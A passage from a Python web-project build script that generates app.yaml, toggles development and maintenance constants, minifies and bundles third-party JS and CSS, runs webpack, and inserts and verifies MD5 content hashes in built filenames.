'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted file' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
